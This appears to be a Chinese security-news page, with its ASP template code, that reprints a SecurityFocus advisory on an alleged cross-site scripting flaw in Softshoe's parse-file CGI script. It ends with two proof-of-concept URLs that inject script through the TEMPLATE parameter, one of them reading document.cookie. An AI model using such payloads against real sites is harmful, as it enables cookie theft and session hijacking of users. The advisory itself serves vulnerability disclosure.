<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("attacks,scripting") PageTitle=stripHTML("Softshoe Parse-file Cross-Site Scripting Vulnerability") ArticleIntro=stripHTML("77169.com小编引言:Softshoe Parse-file Cross-Site Scripting Vulnerability,漏洞的主要原因:") Articlecontent=stripHTML("source: http://www.securityfocus.com/bid/8294/info

Softshoe is allegedly prone …") ModuleName = stripHTML("exploits") InfoID = stripHTML("170674") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> Softshoe Parse-file Cross-Site Scripting Vulnerability - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

Softshoe Parse-file Cross-Site Scripting Vulnerability

2003/7/26 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>
source: http://www.securityfocus.com/bid/8294/info

Softshoe is allegedly prone to cross-site scripting attacks. An attacker can exploit this issue by creating a malicious link that contains hostile HTML or script code to a site that is hosting the vulnerable software. If such a link is visited, the attacker-supplied code may be rendered in the user's web browser.

http://www.example.com/cgi-bin/parse-file?TEMPLATE=<script>alert('Bahaa');</script>

http://www.example.com/cgi-bin/parse-file?TEMPLATE=<script>alert
(document.cookie);</script>